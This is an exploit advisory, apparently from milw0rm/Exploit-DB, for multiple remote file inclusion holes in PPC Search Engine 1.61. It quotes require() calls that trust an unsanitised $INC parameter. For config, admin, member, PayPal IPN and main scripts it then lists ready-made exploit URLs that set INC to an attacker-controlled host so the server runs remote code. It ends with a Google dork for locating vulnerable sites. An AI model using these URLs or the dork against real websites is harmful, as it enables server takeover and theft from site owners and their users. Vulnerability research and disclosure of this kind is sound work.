PPC Search Engine 1.61 - 'INC' Multiple Remote File Inclusions
Author: IbnuSina
type: webapps
platform: php
port:
date_added: 2007-01-08
date_updated:
verified: 1
codes: OSVDB-33454;CVE-2007-0167;OSVDB-33453;OSVDB-33452;OSVDB-33451;OSVDB-33450;OSVDB-33449;OSVDB-33448;OSVDB-33447;OSVDB-33446;OSVDB-33445;OSVDB-33444
tags:
aliases:
screenshot_url:
application_url:
============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# script demo: http://www.hyper-scripts.com/demo/ppc/
# Risk : very danger
# Thanks To : all #hitamputih crew
# special To : str0ke@milw0rm.com,akukasih,nyubi,irvian,BlueSpy
[[SQL]]]---------------------------------------------------------
on dir config
file config_admin.php
================
require($INC."functions/functions_admin.php");
// require($INC."functions/functions_payment.php");
require($INC."config/admin_pw.php");
require($INC."config/config_member.php");
file config_main.php
require($INC."config/site_url.php");
require($INC."config/mysql_config.php");
require($INC."functions/functions_main.php");
require($INC."functions/external_results.php");
file config_member.php
=================
require($INC."functions/functions_member.php");
require($INC."functions/functions_payment.php");
file mysql_config.php
===============
require($INC."functions/db_functions.php");
require($INC."config/db_info.php");
explot :
http://target.lu/path/config/config_admin.php?INC=http://injekan.lu?
http://target.lu/path/config/config_main.php?INC=http://injekan.lu?
http://target.lu/path/config/config_member.php?INC=http://injekan.lu?
http://target.lu/path/config/mysql_config.php?INC=http://injekan.lu?
on dir admini
file admin.php
===========
require($INC."config/config_main.php");
require($INC."config/config_admin.php");
require($INC."functions/functions_bu_and_reports.php");
require($INC."config/dbstructure.php");
file index.php
============
require("path.php");
require($INC."config/config_main.php");
require($INC."config/config_admin.php");
exploit :
http://target.lu/path/admini/admin.php?INC=http://injekan.lu?
http://target.lu/path/admini/index.php?INC=http://injekan.lu?
on dir paypalipn
file ipnprocess.php
require($INC."config/config_main.php");
require($INC."functions/functions_payment.php");
exploit :
http://target.lu/path/paypalipn/ipnprocess.php?INC=http://injekan.lu?
on dir members
require($INC."config/config_main.php");
require($INC."config/config_member.php");
require($INC."functions/functions_bu_and_reports.php");
exploit :
http://target.lu/path/members/index.php?INC=http://injekan.lu?
http://target.lu/path/members/registration.php?INC=http://injekan.lu?
on dir main
file index.php
require("path.php");
require($INC."config/config_main.php");
require($INC."config/config_main2.php");
require($INC."functions/functions_search.php");
mysql_connect ($DBHost, $DBLogin, $DBPassword);
file ppcbannerclick.php and ppcclick.php
require("path.php");
require($INC."config/config_main.php");
exploit :
http://target.lu/path/main/ppcbannerclick.php?INC=http://injekan.lu?
http://target.lu/path/main/ppcclick.php?INC=http://injekan.lu?
google dork : intitle:"ppc engine admin login form"
=======================================================
# milw0rm.com [2007-01-09]